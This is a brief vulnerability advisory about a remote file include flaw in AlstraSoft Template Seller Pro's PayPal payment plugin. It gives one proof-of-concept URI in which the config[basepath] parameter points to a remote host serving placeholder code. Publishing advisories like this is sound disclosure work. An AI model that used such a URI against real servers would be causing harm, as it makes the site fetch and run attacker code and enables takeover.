AlstraSoft Template Seller Pro Remote File Include Vulnerability

AlstraSoft Template Seller Pro Remote File Include Vulnerability

An exploit is not required.

The following proof of concept URI is available:
http://www.example.com/include/paymentplugins/payment_paypal.php?config[basepath]=http://www.example.com/[CODE]?